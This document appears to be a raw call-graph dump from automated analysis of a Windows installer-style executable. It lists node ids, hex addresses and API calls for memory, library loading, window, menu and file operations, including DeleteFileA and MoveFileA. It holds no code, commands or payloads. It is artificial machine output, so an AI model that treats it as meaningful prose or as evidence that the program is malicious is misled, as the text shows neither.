TlsSetValue TlsGetValue TlsGetValue VariantClear 50079->50132 50082 492cf6 50083 492d07 CharToOemBuffA 50082->50083 50134 48cce0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50083->50134 50086 447000 50085->50086 50139 436078 50086->50139 50088 44701f 50088->49960 50090 447280 50089->50090 50193 4363e0 VariantClear 50090->50193 50092 4472ba 50092->50048 50093 4472a3 50093->50092 50194 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50093->50194 50095->49954 50096->49972 50097->49977 50098->49983 50099->49987 50100->49978 50101->49986 50102->49994 50103->50000 50104->50035 50105->49988 50106->49996 50107->50002 50108->50009 50109->50048 50110->50010 50111->50015 50112->50019 50113->50018 50114->50025 50115->50030 50116->50035 50117->50026 50118->50033 50119->50041 50120->50048 50195 403738 50121->50195 50124->50060 50125->50069 50126->50073 50127->50035 50128->50035 50129->50056 50130->50048 50131->50076 50132->50048 50133->50082 50134->50048 50137 403426 50135->50137 50136 40344b 50137->50136 50138 402660 4 API calls 50137->50138 50138->50137 50140 436084 50139->50140 50150 4360a6 50139->50150 50140->50150 50159 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50140->50159 50141 436129 50168 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50141->50168 50143 436111 50163 403494 50143->50163 50144 436105 50144->50088 50145 4360f9 50154 403510 4 API calls 50145->50154 50146 4360ed 50160 403510 50146->50160 50147 43611d 50167 4040e8 18 API calls 50147->50167 50150->50141 50150->50143 50150->50144 50150->50145 50150->50146 50150->50147 50153 43613a 50153->50088 50158 436102 50154->50158 50156 436126 50156->50088 50158->50088 50159->50150 50169 4034e0 50160->50169 50165 403498 50163->50165 50164 4034ba 50164->50088 50165->50164 50166 402660 4 API calls 50165->50166 50166->50164 50167->50156 50168->50153 50174 4034bc 50169->50174 50171 4034f0 50179 403400 50171->50179 50175 4034c0 50174->50175 50176 4034dc 50174->50176 50183 402648 50175->50183 50176->50171 50178 4034c9 50178->50171 50180 403406 50179->50180 50181 40341f 50179->50181 50180->50181 50188 402660 50180->50188 50181->50088 50184 40264c 50183->50184 50185 402656 50183->50185 50184->50185 50187 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50184->50187 50185->50178 50185->50185 50187->50185 50189 402664 50188->50189 50190 40266e 50188->50190 50189->50190 50192 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50189->50192 50190->50181 50190->50190 50192->50190 50193->50093 50194->50092 50196 40373c LoadLibraryA 50195->50196 50196->50043 54096 498ba8 54154 403344 54096->54154 54098 498bb6 54157 4056a0 54098->54157 54100 498bbb 54160 40631c GetModuleHandleA GetProcAddress 54100->54160 54104 498bc5 54168 40994c 54104->54168 54435 4032fc 54154->54435 54156 403349 GetModuleHandleA GetCommandLineA 54156->54098 54159 4056db 54157->54159 54436 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54157->54436 54159->54100 54161 406338 54160->54161 54162 40633f GetProcAddress 54160->54162 54161->54162 54163 406355 GetProcAddress 54162->54163 54164 40634e 54162->54164 54165 406364 SetProcessDEPPolicy 54163->54165 54166 406368 54163->54166 54164->54163 54165->54166 54167 4063c4 6F551CD0 54166->54167 54167->54104 54437 409024 54168->54437 54435->54156 54436->54159 54438 408cbc 5 API calls 54437->54438 54439 409035 54438->54439 54440 4085dc GetSystemDefaultLCID 54439->54440 54444 408612 54440->54444 54441 408568 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 54441->54444 54442 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54442->54444 54443 406dec LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54443->54444 54444->54441 54444->54442 54444->54443 54445 408674 54444->54445 54446 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54445->54446 54447 406dec LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54445->54447 54448 408568 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 54445->54448 54449 4086f7 54445->54449 54446->54445 54447->54445 54448->54445 54450 403420 4 API calls 54449->54450 54451 408711 54450->54451 54452 408720 GetSystemDefaultLCID 54451->54452 54509 408568 GetLocaleInfoA 54452->54509 54455 403450 4 API calls 54456 408760 54455->54456 54457 408568 5 API calls 54456->54457 54458 408775 54457->54458 54459 408568 5 API calls 54458->54459 54460 408799 54459->54460 54515 4085b4 GetLocaleInfoA 54460->54515 54463 4085b4 GetLocaleInfoA 54464 4087c9 54463->54464 54465 408568 5 API calls 54464->54465 54466 4087e3 54465->54466 54467 4085b4 GetLocaleInfoA 54466->54467 54510 4085a1 54509->54510 54511 40858f 54509->54511 54512 403494 4 API calls 54510->54512 54513 4034e0 4 API calls 54511->54513 54514 40859f 54512->54514 54513->54514 54514->54455 54516 4085d0 54515->54516 54516->54463 55870 42f520 55871 42f52b 55870->55871 55872 42f52f NtdllDefWindowProc_A 55870->55872 55872->55871 50197 416b42 50198 416bea 50197->50198 50199 416b5a 50197->50199 50216 41531c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50198->50216 50201 416b74 SendMessageA 50199->50201 50202 416b68 50199->50202 50212 416bc8 50201->50212 50203 416b72 CallWindowProcA 50202->50203 50204 416b8e 50202->50204 50203->50212 50213 41a058 GetSysColor 50204->50213 50207 416b99 SetTextColor 50208 416bae 50207->50208 50214 41a058 GetSysColor 50208->50214 50210 416bb3 SetBkColor 50215 41a6e0 GetSysColor CreateBrushIndirect 50210->50215 50213->50207 50214->50210 50215->50212 50216->50212 55873 4358e0 55874 4358f5 55873->55874 55878 43590f 55874->55878 55879 4352c8 55874->55879 55884 435312 55879->55884 55890 4352f8 55879->55890 55880 403400 4 API calls 55881 435717 55880->55881 55881->55878 55892 435728 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55881->55892 55882 446da4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55882->55890 55883 402648 4 API calls 55883->55890 55884->55880 55886 431ca0 4 API calls 55886->55890 55887 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55887->55890 55888 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55888->55890 55889 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55889->55890 55890->55882 55890->55883 55890->55884 55890->55886 55890->55887 55890->55888 55890->55889 55893 4343b0 55890->55893 55905 434b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55890->55905 55892->55878 55894 43446d 55893->55894 55895 4343dd 55893->55895 55924 434310 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55894->55924 55896 403494 4 API calls 55895->55896 55898 4343eb 55896->55898 55900 403778 4 API calls 55898->55900 55899 403400 4 API calls 55901 4344bd 55899->55901 55903 43440c 55900->55903 55901->55890 55902 43445f 55902->55899 55903->55902 55906 494944 55903->55906 55905->55890 55907 49497c 55906->55907 55908 494a14 55906->55908 55909 403494 4 API calls 55907->55909 55925 448930 55908->55925 55913 494987 55909->55913 55911 494997 55912 403400 4 API calls 55911->55912 55914 494a38 55912->55914 55913->55911 55915 4037b8 4 API calls 55913->55915 55916 403400 4 API calls 55914->55916 55918 4949b0 55915->55918 55917 494a40 55916->55917 55917->55903 55918->55911 55919 4037b8 4 API calls 55918->55919 55920 4949d3 55919->55920 55921 403778 4 API calls 55920->55921 55922 494a04 55921->55922 55923 403634 4 API calls 55922->55923 55923->55908 55924->55902 55926 448955 55925->55926 55927 448998 55925->55927 55928 403494 4 API calls 55926->55928 55929 4489ac 55927->55929 55937 44852c 55927->55937 55930 448960 55928->55930 55932 403400 4 API calls 55929->55932 55934 4037b8 4 API calls 55930->55934 55933 4489df 55932->55933 55933->55911 55935 44897c 55934->55935 55936 4037b8 4 API calls 55935->55936 55936->55927 55938 403494 4 API calls 55937->55938 55939 448562 55938->55939 55940 4037b8 4 API calls 55939->55940 55941 448574 55940->55941 55942 403778 4 API calls 55941->55942 55943 448595 55942->55943 55944 4037b8 4 API calls 55943->55944 55945 4485ad 55944->55945 55946 403778 4 API calls 55945->55946 55947 4485d8 55946->55947 55948 4037b8 4 API calls 55947->55948 55957 4485f0 55948->55957 55949 448628 55951 403420 4 API calls 55949->55951 55950 4486c3 55955 4486cb GetProcAddress 55950->55955 55952 448708 55951->55952 55952->55929 55953 44864b LoadLibraryExA 55953->55957 55954 44865d LoadLibraryA 55954->55957 55956 4486de 55955->55956 55956->55949 55957->55949 55957->55950 55957->55953 55957->55954 55958 403b80 4 API calls 55957->55958 55959 403450 4 API calls 55957->55959 55961 43da88 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55957->55961 55958->55957 55959->55957 55961->55957 50217 402584 50218 402598 50217->50218 50219 4025ab 50217->50219 50247 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 50218->50247 50221 4025c2 RtlEnterCriticalSection 50219->50221 50222 4025cc 50219->50222 50221->50222 50233 4023b4 13 API calls 50222->50233 50223 40259d 50223->50219 50225 4025a1 50223->50225 50226 4025d5 50227 4025d9 50226->50227 50234 402088 50226->50234 50229 402635 50227->50229 50230 40262b RtlLeaveCriticalSection 50227->50230 50230->50229 50231 4025e5 50231->50227 50248 402210 9 API calls 50231->50248 50233->50226 50235 40209c 50234->50235 50236 4020af 50234->50236 50255 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 50235->50255 50238 4020c6 RtlEnterCriticalSection 50236->50238 50241 4020d0 50236->50241 50238->50241 50239 4020a1 50239->50236 50240 4020a5 50239->50240 50242 402106 50240->50242 50241->50242 50249 401f94 50241->50249 50242->50231 50245 4021f1 RtlLeaveCriticalSection 50246 4021fb 50245->50246 50246->50231 50247->50223 50248->50227 50250 401fa4 50249->50250 50251 401fd0 50250->50251 50254 401ff4 50250->50254 50256 401f0c 50250->50256 50251->50254 50261 401db4 50251->50261 50254->50245 50254->50246 50255->50239 50265 40178c 50256->50265 50259 401f29 50259->50250 50262 401e02 50261->50262 50263 401dd2 50261->50263 50262->50263 50293 401d1c 50262->50293 50263->50254 50268 4017a8 50265->50268 50267 4017b2 50284 401678 VirtualAlloc 50267->50284 50268->50267 50270 40180f 50268->50270 50272 401803 50268->50272 50276 4014e4 50268->50276 50285 4013e0 LocalAlloc 50268->50285 50270->50259 50275 401e80 9 API calls 50270->50275 50286 4015c0 VirtualFree 50272->50286 50273 4017be 50273->50270 50275->50259 50277 4014f3 VirtualAlloc 50276->50277 50279 401520 50277->50279 50280 401543 50277->50280 50287 401398 50279->50287 50280->50268 50283 401530 VirtualFree 50283->50280 50284->50273 50285->50268 50286->50270 50290 401340 50287->50290 50291 40134c LocalAlloc 50290->50291 50292 40135e 50290->50292 50291->50292 50292->50280 50292->50283 50294 401d2e 50293->50294 50295 401d51 50294->50295 50296 401d63 50294->50296 50306 401940 50295->50306 50298 401940 3 API calls 50296->50298 50299 401d61 50298->50299 50300 401d79 50299->50300 50316 401bf8 9 API calls 50299->50316 50300->50263 50302 401d88 50303 401da2 50302->50303 50317 401c4c 9 API calls 50302->50317 50318 401454 LocalAlloc 50303->50318 50307 401966 50306->50307 50315 4019bf 50306->50315 50319 40170c 50307->50319 50311 401983 50312 40199a 50311->50312 50324 4015c0 VirtualFree 50311->50324 50312->50315 50325 401454 LocalAlloc 50312->50325 50315->50299 50316->50302 50317->50303 50318->50300 50320 401743 50319->50320 50321 401783 50320->50321 50322 40175d VirtualFree 50320->50322 50323 4013e0 LocalAlloc 50321->50323 50322->50320 50323->50311 50324->50312 50325->50315 50326 416644 50327 416651 50326->50327 50328 4166ab 50326->50328 50333 416550 CreateWindowExA 50327->50333 50329 416658 SetPropA SetPropA 50329->50328 50330 41668b 50329->50330 50331 41669e SetWindowPos 50330->50331 50331->50328 50333->50329 55962 4222e4 55963 4222f3 55962->55963 55968 421274 55963->55968 55966 422313 55969 4212e3 55968->55969 55982 421283 55968->55982 55972 4212f4 55969->55972 55993 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55969->55993 55971 421322 55974 421395 55971->55974 55979 42133d 55971->55979 55972->55971 55973 4213ba 55972->55973 55976 4213ce SetMenu 55973->55976 55990 421393 55973->55990 55981 4213a9 55974->55981 55974->55990 55975 4213e6 55996 4211bc 10 API calls 55975->55996 55976->55990 55985 421360 GetMenu 55979->55985 55979->55990 55980 4213ed 55980->55966 55991 4221e8 10 API calls 55980->55991 55984 4213b2 SetMenu 55981->55984 55982->55969 55992 408d2c 19 API calls 55982->55992 55984->55990 55986 421383 55985->55986 55987 42136a 55985->55987 55994 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55986->55994 55989 42137d SetMenu 55987->55989 55989->55986 55990->55975 55995 421e2c 11 API calls 55990->55995 55991->55966 55992->55982 55993->55972 55994->55990 55995->55975 55996->55980 55997 44b4a8 55998 44b4b6 55997->55998 56000 44b4d5 55997->56000 55999 44b38c 11 API calls 55998->55999 55998->56000 55999->56000 56001 448728 56002 448756 56001->56002 56003 44875d 56001->56003 56005 403400 4 API calls 56002->56005 56004 448771 56003->56004 56006 44852c 7 API calls 56003->56006 56004->56002 56007 403494 4 API calls 56004->56007 56008 448907 56005->56008 56006->56004 56009 44878a 56007->56009 56010 4037b8 4 API calls 56009->56010 56011 4487a6 56010->56011 56012 4037b8 4 API calls 56011->56012 56013 4487c2 56012->56013 56013->56002 56014 4487d6 56013->56014 56015 4037b8 4 API calls 56014->56015 56016 4487f0 56015->56016 56017 431bd0 4 API calls 56016->56017 56018 448812 56017->56018 56019 431ca0 4 API calls 56018->56019 56026 448832 56018->56026 56019->56018 56020 448888 56033 442334 56020->56033 56021 448870 56021->56020 56045 4435d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56021->56045 56025 4488bc GetLastError 56046 4484c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56025->56046 56026->56021 56044 4435d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56026->56044 56028 4488cb 56047 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56028->56047 56030 4488e0 56048 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56030->56048 56032 4488e8 56034 443312 56033->56034 56035 44236d 56033->56035 56037 403400 4 API calls 56034->56037 56036 403400 4 API calls 56035->56036 56038 442375 56036->56038 56039 443327 56037->56039 56040 431bd0 4 API calls 56038->56040 56039->56025 56041 442381 56040->56041 56042 443302 56041->56042 56049 441a0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56041->56049 56042->56025 56044->56026 56045->56020 56046->56028 56047->56030 56048->56032 56049->56041 56050 4165ec DestroyWindow 56051 42e3ef SetErrorMode 50334 441394 50335 44139d 50334->50335 50336 4413ab WriteFile 50334->50336 50335->50336 50337 4413b6 50336->50337 50338 416410 50339 416422 50338->50339 50340 416462 GetClassInfoA 50339->50340 50358 408d2c 19 API calls 50339->50358 50341 41648e 50340->50341 50342 4164b0 RegisterClassA 50341->50342 50343 4164a0 UnregisterClassA 50341->50343 50348 4164e9 50341->50348 50345 4164d8 50342->50345 50342->50348 50343->50342 50359 408cbc 50345->50359 50346 41645d 50346->50340 50349 416506 50348->50349 50350 416517 50348->50350 50349->50348 50352 408cbc 5 API calls 50349->50352 50367 407544 50350->50367 50352->50350 50355 416530 50372 41a1e8 50355->50372 50357 41653a 50358->50346 50360 408cc8 50359->50360 50380 406dec LoadStringA 50360->50380 50365 403400 4 API calls 50366 408d0e 50365->50366 50366->50348 50368 407552 50367->50368 50369 407548 50367->50369 50371 418384 7 API calls 50368->50371 50370 402660 4 API calls 50369->50370 50370->50368 50371->50355 50373 41a213 50372->50373 50374 41a2af 50372->50374 50389 403520 50373->50389 50375 403400 4 API calls 50374->50375 50376 41a2c7 50375->50376 50376->50357 50378 41a26b 50379 41a2a3 CreateFontIndirectA 50378->50379 50379->50374 50381 4034e0 4 API calls 50380->50381 50382 406e19 50381->50382 50383 403450 50382->50383 50385 403454 50383->50385 50387 403464 50383->50387 50384 403490 50384->50365 50386 4034bc 4 API calls 50385->50386 50385->50387 50386->50387 50387->50384 50388 402660 4 API calls 50387->50388 50388->50384 50390 4034e0 4 API calls 50389->50390 50391 40352a 50390->50391 50391->50378 56052 491bf8 56053 491c32 56052->56053 56054 491c34 56053->56054 56057 491c3e 56053->56057 56248 409098 MessageBeep 56054->56248 56056 491c39 56060 403420 4 API calls 56056->56060 56058 491c4d 56057->56058 56059 491c76 56057->56059 56061 446ff8 18 API calls 56058->56061 56064 491cae 56059->56064 56065 491c85 56059->56065 56062 49228a 56060->56062 56063 491c5a 56061->56063 56066 403400 4 API calls 56062->56066 56249 406bb0 56063->56249 56074 491cbd 56064->56074 56075 491ce6 56064->56075 56068 446ff8 18 API calls 56065->56068 56069 492292 56066->56069 56071 491c92 56068->56071 56257 406c00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56071->56257 56077 446ff8 18 API calls 56074->56077 56081 491d0e 56075->56081 56082 491cf5 56075->56082 56076 491c9d 56258 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56076->56258 56079 491cca 56077->56079 56259 406c34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56079->56259 56088 491d1d 56081->56088 56089 491d42 56081->56089 56261 407280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 56082->56261 56083 491cd5 56260 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56083->56260 56086 491cfd 56262 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56086->56262 56090 446ff8 18 API calls 56088->56090 56093 491d7a 56089->56093 56094 491d51 56089->56094 56091 491d2a 56090->56091 56092 4072a8 SetCurrentDirectoryA 56091->56092 56095 491d32 56092->56095 56099 491d89 56093->56099 56100 491db2 56093->56100 56096 446ff8 18 API calls 56094->56096 56263 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56095->56263 56098 491d5e 56096->56098 56101 42c804 5 API calls 56098->56101 56102 446ff8 18 API calls 56099->56102 56107 491dfe 56100->56107 56108 491dc1 56100->56108 56103 491d69 56101->56103 56104 491d96 56102->56104 56264 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56103->56264 56265 4071f8 8 API calls 56104->56265 56114 491e0d 56107->56114 56115 491e36 56107->56115 56110 446ff8 18 API calls 56108->56110 56109 491da1 56266 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56109->56266 56112 491dd0 56110->56112 56113 446ff8 18 API calls 56112->56113 56116 491de1 56113->56116 56117 446ff8 18 API calls 56114->56117 56121 491e6e 56115->56121 56122 491e45 56115->56122 56267 4918fc 8 API calls 56116->56267 56119 491e1a 56117->56119 56123 42c8a4 5 API calls 56119->56123 56120 491ded 56268 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56120->56268 56130 491e7d 56121->56130 56131 491ea6 56121->56131 56125 446ff8 18 API calls 56122->56125 56126 491e25 56123->56126 56127 491e52 56125->56127 56269 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56126->56269 56129 42c8cc 5 API calls 56127->56129 56132 491e5d 56129->56132 56133 446ff8 18 API calls 56130->56133 56137 491ede 56131->56137 56138 491eb5 56131->56138 56270 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56132->56270 56135 491e8a 56133->56135 56271 42c8fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 56135->56271 56143 491eed 56137->56143 56144 491f16 56137->56144 56140 446ff8 18 API calls 56138->56140 56139 491e95 56272 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56139->56272 56142 491ec2 56140->56142 56145 42c92c 5 API calls 56142->56145 56146 446ff8 18 API calls 56143->56146 56151 491f62 56144->56151 56152 491f25 56144->56152 56147 491ecd 56145->56147 56148 491efa 56146->56148 56273 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56147->56273 56150 42c954 5 API calls 56148->56150 56153 491f05 56150->56153 56157 491f71 56151->56157 56158 491fb4 56151->56158 56154 446ff8 18 API calls 56152->56154 56274 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56153->56274 56156 491f34 56154->56156 56159 446ff8 18 API calls 56156->56159 56160 446ff8 18 API calls 56157->56160 56165 491fc3 56158->56165 56166 492027 56158->56166 56161 491f45 56159->56161 56163 491f84 56160->56163 56275 42c4f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 56161->56275 56167 446ff8 18 API calls 56163->56167 56164 491f51 56276 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56164->56276 56169 446ff8 18 API calls 56165->56169 56173 492066 56166->56173 56174 492036 56166->56174 56170 491f95 56167->56170 56171 491fd0 56169->56171 56277 491af4 12 API calls 56170->56277 56240 42c608 7 API calls 56171->56240 56186 4920a5 56173->56186 56187 492075 56173->56187 56177 446ff8 18 API calls 56174->56177 56176 491fa3 56278 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56176->56278 56180 492043 56177->56180 56178 491fde 56181 491fe2 56178->56181 56182 492017 56178->56182 56281 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 56180->56281 56185 446ff8 18 API calls 56181->56185 56280 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56182->56280 56190 491ff1 56185->56190 56195 4920e4 56186->56195 56196 4920b4 56186->56196 56188 446ff8 18 API calls 56187->56188 56191 492082 56188->56191 56189 492050 56282 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56189->56282 56241 452c80 56190->56241 56194 452770 5 API calls 56191->56194 56199 49208f 56194->56199 56204 49212c 56195->56204 56205 4920f3 56195->56205 56200 446ff8 18 API calls 56196->56200 56197 492061 56197->56056 56198 492001 56279 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56198->56279 56283 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56199->56283 56203 4920c1 56200->56203 56284 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56203->56284 56212 49213b 56204->56212 56213 492174 56204->56213 56207 446ff8 18 API calls 56205->56207 56209 492102 56207->56209 56208 4920ce 56285 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56208->56285 56211 446ff8 18 API calls 56209->56211 56215 492113 56211->56215 56214 446ff8 18 API calls 56212->56214 56218 492187 56213->56218 56224 49223d 56213->56224 56216 49214a 56214->56216 56220 447278 5 API calls 56215->56220 56217 446ff8 18 API calls 56216->56217 56219 49215b 56217->56219 56221 446ff8 18 API calls 56218->56221 56226 447278 5 API calls 56219->56226 56220->56056 56222 4921b4 56221->56222 56223 446ff8 18 API calls 56222->56223 56227 4921cb 56223->56227 56224->56056 56289 446f9c 18 API calls 56224->56289 56226->56056 56286 407ddc 7 API calls 56227->56286 56228 492256 56229 42e8c8 5 API calls 56228->56229 56230 49225e 56229->56230 56290 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56230->56290 56233 4921ed 56234 446ff8 18 API calls 56233->56234 56235 492201 56234->56235 56287 408508 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56235->56287 56237 49220c 56288 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56237->56288 56239 492218 56240->56178 56242 452724 2 API calls 56241->56242 56243 452c99 56242->56243 56244 452c9d 56243->56244 56245 452cc1 MoveFileA GetLastError 56243->56245 56244->56198 56246 452760 Wow64RevertWow64FsRedirection 56245->56246 56247 452ce7 56246->56247 56247->56198 56248->56056 56250 406bbf 56249->56250 56251 406be1 56250->56251 56252 406bd8 56250->56252 56254 403778 4 API calls 56251->56254 56253 403400 4 API calls 56252->56253 56255 406bdf 56253->56255 56254->56255 56256 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56255->56256 56256->56056 56257->56076 56258->56056 56259->56083 56260->56056 56261->56086 56262->56056 56263->56056 56264->56056 56265->56109 56266->56056 56267->56120 56268->56056 56269->56056 56270->56056 56271->56139 56272->56056 56273->56056 56274->56056 56275->56164 56276->56056 56277->56176 56278->56056 56279->56056 56280->56056 56281->56189 56282->56197 56283->56056 56284->56208 56285->56056 56286->56233 56287->56237 56288->56239 56289->56228 56290->56056 56291 40cc34 56294 406f10 WriteFile 56291->56294 56295 406f2d 56294->56295 50392 48095d 50397 451004 50392->50397 50394 480971 50407 47fa0c 50394->50407 50396 480995 50398 451011 50397->50398 50400 451065 50398->50400 50416 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50398->50416 50413 450e88 50400->50413 50404 45108d 50405 4510d0 50404->50405 50418 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50404->50418 50405->50394 50423 40b3c8 50407->50423 50409 47fa79 50409->50396 50412 47fa2e 50412->50409 50427 4069dc 50412->50427 50430 476994 50412->50430 50419 450e34 50413->50419 50416->50400 50417 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50417->50404 50418->50405 50420 450e57 50419->50420 50421 450e46 50419->50421 50420->50404 50420->50417 50422 450e4b InterlockedExchange 50421->50422 50422->50420 50424 40b3d3 50423->50424 50426 40b3f3 50424->50426 50446 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50424->50446 50426->50412 50428 402648 4 API calls 50427->50428 50429 4069e7 50428->50429 50429->50412 50438 4769c5 50430->50438 50444 476a0e 50430->50444 50431 476a59 50447 451294 50431->50447 50432 451294 21 API calls 50432->50444 50435 476a70 50437 403420 4 API calls 50435->50437 50436 4038a4 4 API calls 50436->50444 50439 476a8a 50437->50439 50441 403450 4 API calls 50438->50441 50438->50444 50445 451294 21 API calls 50438->50445 50453 4038a4 50438->50453 50462 403744 50438->50462 50439->50412 50441->50438 50442 403744 4 API calls 50442->50444 50443 403450 4 API calls 50443->50444 50444->50431 50444->50432 50444->50436 50444->50442 50444->50443 50445->50438 50446->50426 50448 4512a4 50447->50448 50449 4512af 50447->50449 50448->50435 50466 451238 21 API calls 50449->50466 50451 4512ba 50451->50448 50467 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50451->50467 50454 4038b1 50453->50454 50461 4038e1 50453->50461 50456 4038da 50454->50456 50459 4038bd 50454->50459 50455 403400 4 API calls 50458 4038cb 50455->50458 50457 4034bc 4 API calls 50456->50457 50457->50461 50458->50438 50468 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50459->50468 50461->50455 50463 40374a 50462->50463 50465 40375b 50462->50465 50464 4034bc 4 API calls 50463->50464 50463->50465 50464->50465 50465->50438 50466->50451 50467->50448 50468->50458 50469 41ee54 50470 41ee63 IsWindowVisible 50469->50470 50471 41ee99 50469->50471 50470->50471 50472 41ee6d IsWindowEnabled 50470->50472 50472->50471 50473 41ee77 50472->50473 50474 402648 4 API calls 50473->50474 50475 41ee81 EnableWindow 50474->50475 50475->50471 50476 46bb10 50477 46bb44 50476->50477 50509 46bfad 50476->50509 50479 46bb80 50477->50479 50482 46bbdc 50477->50482 50483 46bbba 50477->50483 50484 46bbcb 50477->50484 50485 46bb98 50477->50485 50486 46bba9 50477->50486 50478 403400 4 API calls 50481 46bfec 50478->50481 50479->50509 50567 468c74 50479->50567 50487 403400 4 API calls 50481->50487 50799 46baa0 45 API calls 50482->50799 50532 46b6d0 50483->50532 50798 46b890 67 API calls 50484->50798 50796 46b420 47 API calls 50485->50796 50797 46b588 42 API calls 50486->50797 50493 46bff4 50487->50493 50494 46bb9e 50494->50479 50494->50509 50495 46bc5b 50499 414ae8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50495->50499 50500 46bd7e 50495->50500 50503 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50495->50503 50504 42cbc0 6 API calls 50495->50504 50506 46af68 23 API calls 50495->50506 50495->50509 50510 46bdd7 50495->50510 50528 46be9f 50495->50528 50570 468bb0 50495->50570 50578 46acd4 50495->50578 50723 483084 50495->50723 50836 46b1dc 19 API calls 50495->50836 50496 46bc18 50496->50495 50496->50509 50800 494da0 50496->50800 50499->50495 50819 48358c 123 API calls 50500->50819 50503->50495 50504->50495 50505 46bd99 50505->50509 50506->50495 50509->50478 50585 469f1c 50510->50585 50511 46af68 23 API calls 50511->50509 50513 46be3d 50514 403450 4 API calls 50513->50514 50515 46be4d 50514->50515 50516 46bea9 50515->50516 50517 46be59 50515->50517 50522 46bf6b 50516->50522 50646 46af68 50516->50646 50820 457f1c 50517->50820 50521 457f1c 24 API calls 50521->50528 50528->50511 50837 46c424 50532->50837 50535 46b852 50536 403420 4 API calls 50535->50536 50538 46b86c 50536->50538 50540 403400 4 API calls 50538->50540 50539 46b71e 50566 46b83e 50539->50566 50844 455f84 13 API calls 50539->50844 50542 46b874 50540->50542 50541 403450 4 API calls 50541->50535 50544 403400 4 API calls 50542->50544 50545 46b87c 50544->50545 50545->50479 50546 46b801 50546->50535 50552 42cd48 7 API calls 50546->50552 50546->50566 50549 46b73c 50550 46b7a1 50549->50550 50845 466600 50549->50845 50550->50535 50550->50546 50854 42cd48 50550->50854 50555 46b817 50552->50555 50560 451458 4 API calls 50555->50560 50555->50566 50562 46b82e 50560->50562 50861 47efd0 42 API calls 50562->50861 50566->50535 50566->50541 50568 468bb0 19 API calls 50567->50568 50569 468c83 50568->50569 50569->50496 50574 468bdf 50570->50574 50571 4078f4 19 API calls 50572 468c18 50571->50572 51114 453344 LocalAlloc TlsSetValue 